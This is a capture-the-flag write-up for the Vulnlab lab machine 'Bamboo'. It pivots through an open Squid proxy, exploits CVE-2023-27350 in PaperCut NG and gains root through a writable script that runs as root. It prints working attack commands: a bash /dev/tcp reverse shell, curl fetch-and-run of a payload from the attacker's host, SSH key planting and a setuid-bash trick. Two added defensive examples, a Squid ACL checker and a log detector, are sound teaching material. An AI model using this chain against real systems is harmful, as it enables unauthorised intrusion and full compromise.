Bamboo is a Medium Linux machine from Vulnlab, created by xct. It involves getting a foothold by exploiting a CVE in PaperCut NG and escalating privileges by exploiting a 0day.

Enumeration

NMAP

We start, as always, with a standard scan. I’ll use rustscan to find the open ports, then nmap to get more details about them.

➜  rustscan --range 1-65535 -b 2000 -a 10.10.66.158
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😡 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.66.158:22
Open 10.10.66.158:3128
➜  sudo nmap -sC -sV -p22,3128 --min-rate=5000 10.10.66.158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 10:02 EST
Nmap scan report for 10.10.66.158
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_ 256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
3128/tcp open http-proxy Squid http proxy 5.2
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/5.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.67 seconds

From the scan, we see that SSH (22) and the Squid proxy (3128) are open.

Squid

With the Squid proxy port open, we may be able to use it to reach services that only listen on the host’s internal interfaces. First, let’s add the IP and port to our proxychains4.conf file like this.

➜  cat /etc/proxychains4.conf | tail -n1
http 10.10.66.158 3128

HackTricks has an article about pentesting Squid (https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid) that is worth checking.
I’ll use a tool called Squidscan, created by xct and available at https://gist.github.com/xct/597d48456214b15108b2817660fdee00. After downloading the files go.mod and squidscan.go, edit squidscan.go to set the machine IP and port.

...
var (
proxyURL = "http://10.10.66.158:3128" // adjust proxy ip & port
numWorkers = 100 // adjust workers
numPorts = 65535 // adjust ports
)
...

Then, install the dependencies

➜  go mod tidy
go: downloading github.com/cheggaaa/pb/v3 v3.1.2
go: downloading github.com/VividCortex/ewma v1.2.0
go: downloading github.com/fatih/color v1.14.1
go: downloading github.com/mattn/go-colorable v0.1.13
go: downloading github.com/mattn/go-isatty v0.0.17
go: downloading github.com/mattn/go-runewidth v0.0.12
go: downloading golang.org/x/sys v0.5.0

Build the tool

➜  go build

And we have a squidscan binary that we can run

➜  ls
go.mod go.sum squidscan squidscan.go
➜  ./squidscan
430 / 65535 [->__________________________________________________________________________________________________________________________________________________________________________________] 0.66% 698 p/s
Port 22 found!
9108 / 65535 [------------------------>_________________________________________________________________________________________________________________________________________________________] 13.90% 540 p/s
Port 9173 found!
Port 9174 found!
9239 / 65535 [------------------------->________________________________________________________________________________________________________________________________________________________] 14.10% 548 p/s
Port 9195 found!
Port 9192 found!
10104 / 65535 [--------------------------->_____________________________________________________________________________________________________________________________________________________] 15.42% 528 p/s
Port 9191 found!
65533 / 65535 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->] 100.00% 1 p/s

It found several ports open on the internal interface. We can use nmap through proxychains to scan those specific ports and identify the service behind each one.

➜  proxychains -q nmap -sC -sV -p22,9173,9174,9195,9192,9191 127.0.0.1 --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 10:24 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_ 256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
9173/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9174/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: organizationName=PaperCut Software International Pty Ltd./stateOrProvinceName=VIC/countryName=AU
| Not valid before: 2023-05-26T13:10:12
|_Not valid after: 2033-05-26T13:10:12
9191/tcp open sun-as-jpda?
| fingerprint-strings:
| ...
9192/tcp open ssl/unknown
| ssl-cert: Subject: commonName=bamboo/organizationName=unknown/stateOrProvinceName=unknown/countryName=unknown
| Not valid before: 2023-05-25T13:09:59
|_Not valid after: 2038-01-18T03:14:07
| fingerprint-strings:
| ...
9195/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=bamboo/organizationName=unknown/stateOrProvinceName=unknown/countryName=unknown
| Subject Alternative Name: DNS:bamboo
| Not valid before: 2023-05-25T13:10:17
|_Not valid after: 2030-05-26T13:10:17
| fingerprint-strings:
| ...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.92 seconds

We have PaperCut NG running on port 9191. Let’s configure Burp to use the proxy address: go to Proxy settings -> Network -> Connections -> Upstream Proxy Servers and add the proxy host and port in the respective fields.
Now, accessing http://127.0.0.1:9191 should load the page.
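
The pivot above works because the proxy forwards requests to 127.0.0.1 on behalf of a remote client. Squid’s default configuration declares an acl named to_localhost and an http_access deny to_localhost rule for exactly this reason; dropping or misordering that rule exposes every service bound to loopback. The script below is an added example, not part of this write-up and not Squid’s own code: it evaluates a minimal http_access policy the way Squid does (first matching line wins, every acl on a line must match, the default is the opposite of the last line) against a constructed weak config and a corrected one. Both configs, the sample requests and the handful of acl types supported are constructed for the illustration; the real squid.conf on this box is not known.

```python
"""Evaluate a Squid http_access policy against sample requests.

Added example: not from the write-up and not Squid's code. Both configs
are constructed; the real squid.conf on the box is not known.
"""
import ipaddress

# Constructed: localnet clients may reach anything, loopback included,
# because the stock "deny to_localhost" rule is never applied.
WEAK_CONF = """
acl all src all
acl localnet src 10.0.0.0/8
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl SSL_ports port 443
acl Safe_ports port 80 21 443 1025-65535
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localnet          # to_localhost is declared but unused
http_access deny all
"""

# Constructed: the same policy with the deny placed before the allow.
FIXED_CONF = WEAK_CONF.replace(
    "http_access allow localnet",
    "http_access deny to_localhost\nhttp_access allow localnet")

# Constructed requests; 10.8.0.210 is the VPN client address from the write-up.
LOOPBACK_SCAN = {"src": "10.8.0.210", "dst": "127.0.0.1", "port": 9191, "method": "GET"}
NORMAL_BROWSING = {"src": "10.8.0.210", "dst": "203.0.113.10", "port": 80, "method": "GET"}
OUTSIDER = {"src": "192.168.1.5", "dst": "203.0.113.10", "port": 80, "method": "GET"}


def parse_squid(conf):
    """Return ({acl_name: (type, [values])}, [(action, [(negated, acl_name)])])."""
    acls, rules = {}, []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl":
            name, atype, values = parts[1], parts[2], parts[3:]
            # Squid lets one acl be declared on several lines; values accumulate.
            acls.setdefault(name, (atype, []))[1].extend(values)
        elif parts[0] == "http_access":
            terms = [(t.startswith("!"), t.lstrip("!")) for t in parts[2:]]
            rules.append((parts[1], terms))
    return acls, rules


def _port_in(values, port):
    """Squid port acls take single ports or lo-hi ranges."""
    for v in values:
        lo, _, hi = v.partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False


def acl_matches(acl, req):
    """Match one acl (src, dst, port or method type) against a request dict."""
    atype, values = acl
    if atype in ("src", "dst"):
        addr = ipaddress.ip_address(req[atype])
        return any(v == "all" or addr in ipaddress.ip_network(v, strict=False)
                   for v in values)
    if atype == "port":
        return _port_in(values, req["port"])
    if atype == "method":
        return req["method"].upper() in {v.upper() for v in values}
    raise ValueError(f"unsupported acl type: {atype}")


def evaluate(conf, req):
    """First http_access line whose terms all match decides; with no match,
    Squid applies the opposite of the last line's action."""
    acls, rules = parse_squid(conf)
    for action, terms in rules:
        if all(acl_matches(acls[name], req) != negated for negated, name in terms):
            return action
    last = rules[-1][0] if rules else "deny"
    return "deny" if last == "allow" else "allow"


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("fixed", FIXED_CONF)):
        print(f"{label}: loopback scan -> {evaluate(conf, LOOPBACK_SCAN)}, "
              f"normal browsing -> {evaluate(conf, NORMAL_BROWSING)}")
```

Feeding a real squid.conf into `evaluate` with a loopback destination and a source the proxy serves is a quick way to confirm whether internal services are reachable the way the scan above found them; the fix is the ordering shown in FIXED_CONF, a deny for loopback (and any other internal ranges) before the first allow.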

User

The PaperCut NG version is 22.0. Let’s look for vulnerabilities affecting that version. Searching for related CVEs leads to this PoC for CVE-2023-27350 on GitHub: https://github.com/horizon3ai/CVE-2023-27350
We can run it as follows. I used a simple curl to test whether the command actually gets executed or not.

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'curl http://10.8.0.210'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

And indeed it gets executed: we got a hit on our Python web server.

➜  http
inet 10.8.0.210 netmask 255.255.255.0 destination 10.8.0.210
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.66.158 - - [14/Dec/2023 10:43:14] "GET / HTTP/1.1" 200 -

Reverse Shell

I will generate a bash reverse shell using my tool shellcat (you can find it here https://github.com/seriotonctf/shellcat)

➜  shellcat bash 10.8.0.210 443 -w x
[+] Payload: bash -i >& /dev/tcp/10.8.0.210/443 0>&1
[+] Payload written to x

If we try to send the reverse shell directly, like the following, we won’t get a shell. Presumably the command is not run through a shell, so the bash redirections are never interpreted.

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'bash -i >& /dev/tcp/10.8.0.210/443 0>&1'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

The method I found working was to transfer the reverse shell file to the machine using curl.

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'curl http://10.8.0.210/x -o /tmp/x'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Then we can just execute it with bash

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'bash /tmp/x'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

And we got a shell as the papercut user

➜  nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.66.158] 57596
bash: cannot set terminal process group (520): Inappropriate ioctl for device
bash: no job control in this shell
papercut@bamboo:~/server$

Let’s stabilize our shell and get the user flag

papercut@bamboo:~/server$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ ^Z
[1] + 19327 suspended nc -nlvp 443
➜ stty raw -echo;fg

[1] + 19327 continued nc -nlvp 443

papercut@bamboo:~/server$ whoami
papercut
papercut@bamboo:~/server$ cd ~
papercut@bamboo:~$ cat user.txt
VL{REDACTED}

It is better to have an SSH shell, so let’s add our key to the authorized_keys file.

➜  ssh-keygen -f papercut
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in papercut
Your public key has been saved in papercut.pub
The key fingerprint is:
SHA256:o+XOCmyqdH/TqTDp5rrp5jK66ZayoT7gWCR5MQE4JnY serioton@eternal
The key's randomart image is:
+---[RSA 3072]----+
|o... |
|+ooE |
|+o.o |
|o o |
| + S |
|. .. .+ . |
|=o..++. o . |
|=X.++oo= o |
|&*O*=+oo= |
+----[SHA256]-----+
➜ cat papercut.pub
ssh-rsa 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 serioton@eternal
papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa 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 serioton@eternal' > authorized_keys
papercut@bamboo:~/.ssh$
➜  chmod 600 papercut
➜ ssh -i papercut papercut@10.10.66.158
The authenticity of host '10.10.66.158 (10.10.66.158)' can't be established.
ED25519 key fingerprint is SHA256:wekk48npWyS2NE8vmnCU9mj9hhAW0AvPCy+R0C4Iz48.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:61: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.66.158' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

...

papercut@bamboo:~$

PrivEsc

We can start enumerating by transferring linpeas.sh to the machine and executing it

papercut@bamboo:/tmp$ wget http://10.8.0.210/linpeas.sh
papercut@bamboo:/tmp$ bash linpeas.sh

linpeas flags some interesting files inside the user’s home directory: several systemd services call executables there that are writable.

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/multi-user.target.wants/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path

Specifically, let’s look at the linux-x64 folder at /home/papercut/server/bin/linux-x64/.

papercut@bamboo:~/server/bin/linux-x64$ ls -lah
total 13M
drwxr-xr-x 3 papercut papercut 4.0K May 26 2023 .
drwx------ 3 papercut papercut 4.0K Sep 29 2022 ..
-rw-r--r-- 1 papercut papercut 1.5K Sep 29 2022 .common
-rwxr-xr-x 1 papercut papercut 109K Sep 29 2022 app-monitor
-rw-r--r-- 1 papercut papercut 5.4K Sep 29 2022 app-monitor.conf
-rwxr-xr-x 1 papercut papercut 17K Sep 29 2022 app-server
-r-s--x--x 1 root root 11K Sep 29 2022 authpam
-rwxr-xr-x 1 papercut papercut 2.4K Sep 29 2022 authsamba
-rwxr-xr-x 1 papercut papercut 479 Sep 29 2022 create-client-config-file
-rwxr-xr-x 1 papercut papercut 468 Sep 29 2022 create-ssl-keystore
-rwxr-xr-x 1 papercut papercut 763 Sep 29 2022 db-tools
-rwxr-xr-x 1 papercut papercut 501 Sep 29 2022 direct-print-monitor-config-initializer
-rwxr-xr-x 1 papercut papercut 2.3K Sep 29 2022 gather-ldap-settings
drwxr-xr-x 2 papercut papercut 4.0K May 26 2023 lib
-rwxr-xr-x 1 papercut papercut 482K Sep 29 2022 pc-pdl-to-image
-rwxr-xr-x 1 papercut papercut 13M Sep 29 2022 pc-split-scan
-rwxr-xr-x 1 papercut papercut 9.4K Sep 29 2022 pc-udp-redirect
-rwxr-xr-x 1 papercut papercut 7.4K Sep 29 2022 roottasks
-rwxr-xr-x 1 papercut papercut 7.6K Sep 29 2022 sambauserdir
-rwxr-xr-x 1 papercut papercut 493 Sep 29 2022 server-command
-rwxr-xr-x 1 papercut papercut 2.3K Sep 29 2022 setperms
-rwxr-xr-x 1 papercut papercut 286 Sep 29 2022 start-server
-rwxr-xr-x 1 papercut papercut 11K Sep 29 2022 stduserdir
-rwxr-xr-x 1 papercut papercut 279 Sep 29 2022 stop-server
-rwxr-xr-x 1 papercut papercut 480 Sep 29 2022 upgrade-server-configuration

These files belong to the PaperCut NG instance running on port 9191, so let’s forward that port via SSH and enumerate further.

➜  ssh -i papercut papercut@10.10.66.158 -L 9191:127.0.0.1:9191 -N

Before beginning any enumeration, we need a way to log in. There is an authentication bypass script on Exploit-DB (https://www.exploit-db.com/exploits/51391) for the same CVE we initially used.
We run it as follows, and it tells us what to do.

➜  python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

We just have to visit those two URLs and, magically, we are in.
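
Both tools used against PaperCut leave a recognisable trail: the RCE PoC flips print-and-device.script.enabled to Y and print.script.sandboxed to N before running its command (visible in its output earlier), and the Exploit-DB bypass fetches SetupCompleted and then Dashboard from the same client. The script below is an added detection example, not part of the write-up or of PaperCut, and runs over constructed log lines. The access log uses the standard combined log format; the application-log layout (the `config key ... set to ...` wording and the leading timestamp) is an assumption and has to be adapted to the real server.log before use.

```python
"""Flag the two PaperCut abuse patterns from this write-up in log data.

Added example, not from the write-up or from PaperCut. All log lines are
constructed; the application-log layout is assumed, not PaperCut's.
"""
import re
from datetime import datetime, timedelta

# Constructed web access log (combined log format). 10.8.0.210 is the client
# address used in the write-up; the other two lines are benign traffic.
ACCESS_LOG = """\
192.168.56.20 - - [14/Dec/2023:09:12:44 -0500] "GET /app?service=page/Dashboard HTTP/1.1" 200 18876 "-" "Mozilla/5.0"
10.8.0.210 - - [14/Dec/2023:10:40:01 -0500] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
10.8.0.210 - - [14/Dec/2023:10:40:02 -0500] "GET /app?service=page/Dashboard HTTP/1.1" 200 18876 "-" "python-requests/2.31.0"
10.8.0.210 - - [14/Dec/2023:10:40:03 -0500] "POST /app HTTP/1.1" 200 2210 "-" "python-requests/2.31.0"
172.16.4.9 - - [14/Dec/2023:11:05:10 -0500] "GET /app?service=page/SetupCompleted HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Constructed application log; the "config key X set to Y" layout is assumed.
APP_LOG = """\
2023-12-14 10:40:02,991 INFO  ConfigEditor - config key print-and-device.script.enabled set to Y
2023-12-14 10:40:03,104 INFO  ConfigEditor - config key print.script.sandboxed set to N
2023-12-14 10:40:05,712 INFO  ConfigEditor - config key print-and-device.script.enabled set to N
2023-12-14 10:40:05,830 INFO  ConfigEditor - config key print.script.sandboxed set to Y
2023-12-14 12:00:00,000 INFO  ConfigEditor - config key system.network-address set to bamboo
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SETUP_PAGE = "/app?service=page/SetupCompleted"
# The values the PoC sets on the way in: scripting on, sandbox off.
RISKY_SETTINGS = {"print-and-device.script.enabled": "Y", "print.script.sandboxed": "N"}
# Greedy \D+ makes the group capture the last Y/N on the line, so phrasings
# like "changed from Y to N" resolve to the new value.
SETTING_RE = re.compile(r"(print-and-device\.script\.enabled|print\.script\.sandboxed)\D+\b([YN])\b")


def parse_access(access_log):
    """Yield (ip, timestamp, method, path, status) per combined-format line."""
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect_setup_bypass(access_log, window=timedelta(minutes=5)):
    """Return client IPs that fetched SetupCompleted with a 200 and then reached
    another /app page within the window. On an already-configured server the
    setup page should not answer 200 at all, so that pairing is the signal."""
    first_hit, flagged = {}, []
    for ip, ts, _method, path, status in parse_access(access_log):
        if path == SETUP_PAGE and status == 200:
            first_hit[ip] = ts
        elif (ip in first_hit and path.startswith("/app") and status == 200
              and ts - first_hit[ip] <= window and ip not in flagged):
            flagged.append(ip)
    return flagged


def detect_script_toggles(app_log):
    """Return (timestamp, key, value) for changes that enable scripting or
    disable the sandbox. The 23-char timestamp slice matches the constructed
    layout above and must follow the real log format."""
    events = []
    for line in app_log.splitlines():
        m = SETTING_RE.search(line)
        if m and RISKY_SETTINGS.get(m.group(1)) == m.group(2):
            events.append((line[:23], m.group(1), m.group(2)))
    return events


if __name__ == "__main__":
    print("setup bypass from:", detect_setup_bypass(ACCESS_LOG))
    for ts, key, value in detect_script_toggles(APP_LOG):
        print(f"{ts} {key} -> {value}")
```

The two detections are complementary: the toggles show up even when the attacker already holds a valid session, while the SetupCompleted pairing catches the bypass before any setting is touched. Either firing on a server that is past initial setup warrants checking the admin audit trail and the print scripts.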
At this point I ran pspy64 and started clicking random things on the website to see what scripts get triggered and by which user.

papercut@bamboo:/tmp$ chmod +x pspy64
papercut@bamboo:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d



Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/12/14 16:54:43 CMD: UID=1001 PID=26434 | ./pspy64
2023/12/14 16:54:43 CMD: UID=1001 PID=26423 | sshd: papercut
2023/12/14 16:54:43 CMD: UID=0 PID=26365 | sshd: papercut [priv]
2023/12/14 16:54:43 CMD: UID=0 PID=26364 |
2023/12/14 16:54:43 CMD: UID=1001 PID=9009 | /usr/bin/gpg-agent --supervised
2023/12/14 16:54:43 CMD: UID=0 PID=8988 |
2023/12/14 16:54:43 CMD: UID=0 PID=8652 |
2023/12/14 16:54:43 CMD: UID=1001 PID=4455 | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/12/14 16:54:43 CMD: UID=0 PID=1458 |
2023/12/14 16:54:43 CMD: UID=1001 PID=1442 | -bash
2023/12/14 16:54:43 CMD: UID=1001 PID=1436 | sshd: papercut@pts/1
2023/12/14 16:54:43 CMD: UID=0 PID=1351 |
2023/12/14 16:54:43 CMD: UID=1001 PID=1350 | (sd-pam)
2023/12/14 16:54:43 CMD: UID=1001 PID=1349 | /lib/systemd/systemd --user
2023/12/14 16:54:43 CMD: UID=0 PID=1346 | sshd: papercut [priv]
2023/12/14 16:54:43 CMD: UID=0 PID=1245 |
...

Eventually I saw the output below in pspy64 when I opened http://127.0.0.1:9191/app?service=page/PrintDeploy, clicked Start Importing Mobility Print printers on the Import Mobility Print queues screen, and pressed Refresh servers.

2023/12/14 17:30:23 CMD: UID=0 PID=1 | /sbin/init
2023/12/14 17:32:27 CMD: UID=0 PID=26667 | v2023-02-14-1341/pc-print-deploy-server -dataDir=/home/papercut/providers/print-deploy/linux-x64//data -pclog.dev
2023/12/14 17:32:27 CMD: UID=0 PID=26669 | cat /proc/1/comm
2023/12/14 17:32:27 CMD: UID=0 PID=26670 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26671 |
2023/12/14 17:32:27 CMD: UID=0 PID=26677 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26676 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26675 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26678 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:29 CMD: UID=0 PID=26697 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd

As you can see, there is a shell script called server-command that gets executed as root (UID=0). So maybe we can write a reverse shell payload, or any other command, into it.
First, let’s confirm that it’s writable.

papercut@bamboo:~/server/bin/linux-x64$ find . -writable
.
./pc-pdl-to-image
./authsamba
./pc-udp-redirect
./start-server
./create-ssl-keystore
./server-command
./app-server
./lib
./lib/libwrapper.so
./lib/wrapper-3.2.3.jar
./gather-ldap-settings
./create-client-config-file
./direct-print-monitor-config-initializer
./db-tools
./upgrade-server-configuration
./app-monitor.conf
./stduserdir
./.common
./pc-split-scan
./setperms
./sambauserdir
./roottasks
./stop-server
./app-monitor

Indeed, we can write to it. I’ll just append a simple command that gives bash the setuid bit.

papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

As you can see, bash currently doesn’t have the setuid bit set.

papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash

But after we trigger the script again by clicking the Refresh servers button and check bash, we can see that the setuid bit is now set.

papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash

We are root on the machine :)

papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)
bash-5.1# cat /root/root.txt
VL{REDACTED}

Alternatively, we can add our own SSH key to root’s authorized_keys file and SSH in as root.

echo 'ssh-rsa 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 serioton@eternal' >> /root/.ssh/authorized_keys
➜  ssh -i root_key root@10.10.66.158
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Dec 14 18:29:35 UTC 2023

System load: 0.05126953125 Processes: 116
Usage of /: 40.0% of 7.57GB Users logged in: 1
Memory usage: 58% IPv4 address for ens5: 10.10.66.158
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

19 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun May 28 09:16:38 2023 from 10.10.1.254
root@bamboo:~# id
uid=0(root) gid=0(root) groups=0(root)

That concludes the box. I hope you learned something new 🐱🐈